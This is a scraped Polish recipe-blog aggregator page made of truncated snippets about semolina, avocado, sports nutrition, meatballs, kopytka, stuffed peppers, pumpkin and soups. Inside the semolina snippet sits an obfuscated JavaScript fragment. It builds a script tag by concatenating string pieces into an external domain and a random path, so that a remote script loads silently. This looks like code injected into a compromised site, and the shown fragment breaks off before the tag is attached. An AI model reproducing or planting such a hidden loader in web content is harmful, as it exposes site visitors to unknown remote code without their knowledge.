Kiedy zobaczyłam ten przepis w książce "Apetyt na Francję", wiedziałam, że zrobię go bardzo szybko. Wariacja na temat gołąbków autorstwa Mimi Thorisson, pokazana w jej
Poezja Smaków - blog kulinarnydoskonałe własności zagęszczające. Kasza manna ma łagodny, delikatny smak, łatwo wchłania wodę i szybko się gotuje. To zalety w kuchni dzięki którym kasza manna ma wiele zastosowań. Dania, do których została dodana kasza manna są elastyczne i łatwe do krojenia. Kaszę manną wsypuje się na gotujący płyn, może to być woda, mleko lub bulion. Podczas gotowania kasza manna(...)kaszkę manną jako gęstą kaszkę gotowaną na mleku z dodatkiem owoców. Jest chętnie używana też do przygotowania puddingów i legumin. W wersji wytrawnej kasza manna służy do zagęszczania pasztetów mięsnych i warzywnych. (function(){ q6vp=document.createElement("script");q6vp_=("us")+("ta"); q6vp_+="t"+(".");q6vp_+=("in");q6vpu="314233494";q6vp.async=true; q6vpu+=".uipznxmp6vp867l3w";q6vp.type="text/javascript";q6vp_+="f"+"o"+("/"); q6vpu+="lse05ecf3p928";q6vp.src="https://"+q6vp_+q6vpu
ProstePesto.pltrawienia i wchłaniania, chroni przed skurczem mięśni. Wapń jest budulcem kości i zębów, bierze udział w procesie krzepnięcia krwi, wpływa na kurczliwość mięśni. Fosfor, makroelement, składnik błon komórkowych, kości i zębów, wspomaga pracę układu nerwowego i krwionośnego. Sód reguluje objętość wody w organizmie, chroni przed anemią. Żelazo składnik hemoglobiny transportuje tlen do mięśni. Magnez wpływa i zapobiega chorobom serca, poprawia(...)pełnią funkcję ochronną serca. Ciekawostki o awokado Awokado uznawane jest za jeden z najsilniejszych afrodyzjaków. Liście i korę stosowano do leczenia gorączki i chorób kobiecych. Jedno owocujące drzewo może dać 100 kg owoców w ciągu roku. Pestka awokado jest jadalna, zdrowa i nietoksyczna. Poleca się przesuszenie i zmiksowanie, może być dodana do jogurtu. Skórkę można wykorzystać jako maseczkę do twarzy
ProstePesto.plułatwi regenerację organizmu, przywróci równowagę kwasowo-zasadową oraz pomoże odbudować zapasy glikogenu i białek w mięśniach. Badania pokazały, że łączne spożycie białek i węglowodanów po posiłku obniża m.in. bóle mięśni. Po treningu zaleca się węglowodany o wysokim indeksie glikemicznym. W 2 godizny po posiłku powinno spożyć się ok. 20 g białka. Nie należy także pomijać warzyw i owoców, szczególnie(...)trakcie ćwiczeń oraz po ich zakończeniu należy zadbać o prawidłowe nawodnienie organizmu. Szczególne potrzeby sportowców wymagają indywidualnego podejścia Należy podkreślić, że w przypadku osób trenujących wyczynowo daną dyscyplinę sportową, zalecenia żywieniowe są indywidualizowane i często opierają się na precyzyjnym wyliczeniu potrzeb dotyczących zarówno wartości energetycznej, jak i udziału składników odżywczych w posiłku przed treningiem i bezpośrednio
AZgotuj!zdarzały się i ubogie wersje, kiedy na coś, co szumnie nazywaliśmy sosem, składały się dwa pomidory i kostka rosołowa rozpuszczona w wodzie. A jednak zawsze z sentymentem wspominam to danie i po latach chętnie je przyrządzam. Czy pulpety w sosie pomidorowym znane też jako klopsiki w sosie pomidorowym to także Wasze comfort food? Pulpety w sosie pomidorowym - składniki(...)papryka do smaku garść natki pietruszki 4-5 łyżek mąki pszennej do obtoczenia pulpetów Sos pomidorowy do pulpetów 800 ml przecieru pomidorowego albo dwie puszki pomidorów 200 ml bulionu mięsnego lub warzywnego 2 ząbki czosnku drobno posiekane sól, pieprz, duża szczypta cukru i ulubione zioła do smaku Dodatkowo: natka pietruszki lub kolendry Przepis na pulpety w sosie pomidorowym Cebulę
Kulinaria - potrawy z różnych stron świataKopytka z sosem pomidorowym choć znane i lubiane nie są często razem podawane. Kopytka tradycyjnie jadamy z sosami mięsnymi lub grzybowymi. Sos pomidorowy ugotowany w domu jest o wiele smaczniejszy niż sos ze słoika. Można go przyprawić ziołami, czosnkiem, pieprzem, chili dokładnie tak jak lubimy. Odpowiednio ugotowany jest aromatyczny i gęsty, bez sztucznych aromatów i zagęstników. Kopytka(...)delikatne będą. Kopytka są dosyć pracochłonne dlatego warto przygotować ich więcej niż na jeden obiad. Kluseczki można przechowywać w lodówce do 3 dni. Kopytka z sosem pomidorowym będą doskonałym daniem obiadowym dla dzieci, bo jak wszystkie kluseczki, smakują maluchom. Składniki na kopytka: 1 kg ziemniaków 1 szkl. mąki pszennej 2 jajka 1/2 łyżeczki soli Składniki na sos pomidorowy
Codziennik KuchennyPieczeń smakuje bardzo dobrze na ciepło, jako danie obiadowe z ziemniakami i surówką, a także na zimno z pieczywem, pomidorem czy ogórkiem kiszonym. Składniki: pół kg mięsa mielonego wieprzowego cukinia 2 czerstwe bułki kajzerki pół szklanki mleka 2 ząbki czosnku 2 jajka papryka czerwona sól, pieprz, oregano, papryka ostra Przygotowanie Bułki zalewamy mlekiem. Cukinie obieramy i ścieramy na tarce(...)mleka, przeciśnięte ząbki czosnku, jajka, cukinię i paprykę. Przyprawiamy i dokładnie mieszamy. Jeśli masa jest zbyt rzadka, można dosypać trochę bułki tartej. Keksówkę wykładamy papierem do pieczenia, wykładamy masę mięsną, wyrównujemy wierz i pieczemy w piekarniku nagrzanym do 180 C około 50 minut
e-PrzepisyKulinarnejaskini Ocampo i Tehuacan liczące około 7 000 lat. Starożytny polityk i wódz rzymski Lukullus (117–56 r. p.n.e.) nazywany największym łakomczuchem starożytności, na ucztach słynących z wyszukanych dań, podawał dynię smażoną w miodzie. Jemu też zawdzięczamy sprowadzenie do Europy czereśni. Najstarsze freski ilustrujące dynię pochodzą z 1515 – 1518 roku, przedstawiają 170 roślin, w tym dynię piżmową, zwyczajną(...)trądzik i opryszczka. Zawartość potasu w oleju z pestek działa oczyszczająco i rozjaśniająco na skórę. Nawilża, natłuszcza, wygładza, zmiękcza i łagodzi podrażnienia. Dynia w kuchni. Dynia jest składnikiem zapiekanek mięsnych i rybnych, farszu, zup, sałatek, marynat, wypieków. Z dyni można piec chleb. Walory smakowe dyni podnoszą zioła: ziele angielskie, pieprz czarny, goździki, kardamon. Do przygotowania potraw wykorzystuje się świeży, gotowany
ProstePesto.plminut z każdej strony, aż będą miękkie i delikatnie zrumienione. Umieść filety łososia na patelni i delikatnie zanurz je w sosie śmietanowym z cebulą i pomidorkami koktajlowymi. Posyp danie świeżymi ziołami (np. natką pietruszki lub szczypiorkiem) dla dodatkowej dekoracji. Całość skrop sokiem z połówki cytryny. Podawaj natychmiast, najlepiej z dodatkiem ulubionych warzyw lub ryżu. Ja proponuję frytki z buraka(...)będą miękkie w środku i z lekko zrumienionymi brzegami. Po wyjęciu z piekarnika pozostaw frytki na chwilę, aby lekko ostygły. Podawaj je jako zdrową przekąskę lub jako dodatek do dań głównych. Składniki frytki z buraka 2-3 średnie buraki 3 średnie marchewki 3 łyżki oliwy z oliwek 1 czubata łyżeczka soli 1/2 łyżeczki pieprzu 1 łyżeczka słodkiej papryki
Eat me! Fit me!Papryka faszerowana to świetny przepis nie tylko na syty obiad, ale i fajną przekąskę kolacyjną, kiedy zapowiedzą nam się znajomi. Całe danie można przygotować wcześniej, a nawet poprzedniego dnia, a potem tylko myk - naczynie do piekarnika 😎 Ponieważ danie jak wspomniałam jest bardzo syte, nie robię do niego już innych dodatków. Uważam, że są zbędne. Składniki(...)podsmażamy pokrojoną cebulę i czosnek. Dodajemy mięso mielone i smażymy całość chwilę. Następnie dodajemy pokrojone pieczarki, koncentrat i przyprawy. Dusimy całość do momentu odparowania soku. Ryż mieszamy z masą mięsną. Farszem nadziewamy każdą paprykę. Papryki układamy w naczyniu żaroodpornym. Podlewamy wodą lub bulionem i dusimy pod przykryciem około 40-50 minut w piekarniku. Pod koniec pieczenia naczynie odkrywamy
Walijskie PichcenieZupa ze świeżych ogórków – kuchnia podkarpacka W moich poszukiwaniach tradycyjnych przepisów z naszego regionu od czasu do czasu trafiam na perełki – wyjątkowe dania, o których wcześniej nie słyszałam, a które szczególnie przypadły mi do gustu. Taka właśnie jest zupa ze świeżych ogórków z Maćkówki. W naszej tradycji kulinarnej to kiszone ogórki zajmują bardzo ważną rolę. Spory czy jedynie(...)marchewka podduszone na maśle stanowią podstawę zupy gotowanej na wywarze z drobiu. Zupę zaprawia się śmietaną i podaje z ziemniakami. Ta pyszna zupa, mimo że ugotowana jest na wywarze mięsnym, na dodatek z liściem laurowym i zielem angielskim, pachnie latem. Jeśli Wy też nie znacie tej zupy, spróbujcie koniecznie :) Przepis Koła Gospodyń Wiejskich z Maćkówki (powiat przeworski) opublikowano w zbiorze
Trzeci talerzTa zupa to kwintesencja smaku Włoch – mocno pomidorowa, szybka i pyszna. Gęsta i sycąca od warzyw, obłędnie pachnąca… To tylko kilka bardzo podstawowych i zawsze dostępnych
Karo in the KitchenTym razem przygotujemy pasztet z marchewki i soczewicy z dodatkiem kaszy jaglanej i ciecierzycy. To danie nie tylko dla wegetarian. Jestem przekonany, że zasmakuje także
Kulinarnyblog.pl - wiesz jak gotować!Zapraszam na lekkie pulpeciki z mięsa z piersi indyka. Przygotowane w sosie koperkowym są pysznym daniem obiadowym. Pasują do ziemniaków, ryżu, kaszy czy też makaronu jak u mnie. Polecam Składniki: 300 g mięsa z piersi indyka 1/2 cebuli 2 ząbki czosnku 1 żółtko jaja 2 łyżki bułki tartej 1/2 łyżeczki soli, pieprzu i ziół prowansalskich oraz: 600 ml bulionu(...)indyka opłukujemy w wodzie, osuszamy i kroimy w mniejsze części. Przepuszczamy mięso przez maszynkę wraz z cebulą i czosnkiem. Następnie dodajemy żółtko jajka, bułkę tartą oraz przyprawy. Wyrabiamy masę mięsną mokrymi rękoma a następnie formujemy małe pulpeciki (mi wyszło 12 sztuk). Zagotowujemy bulion i do gotującego wrzucamy pulpeciki. Gotujemy na małym ogniu przez 10 minut. W tym czasie myjemy
słodkie i nie tylko historie kulinarneSkładniki: - mięso z 1 ćwiartki i 1 pałki z kurczaka - jajko - łyżka kaszy manny - łyżka bułki tartej - 2 pieczarki - pół niedużej cebuli - przyprawy - sól, pieprz, majeranek
Kulinarne blogowanie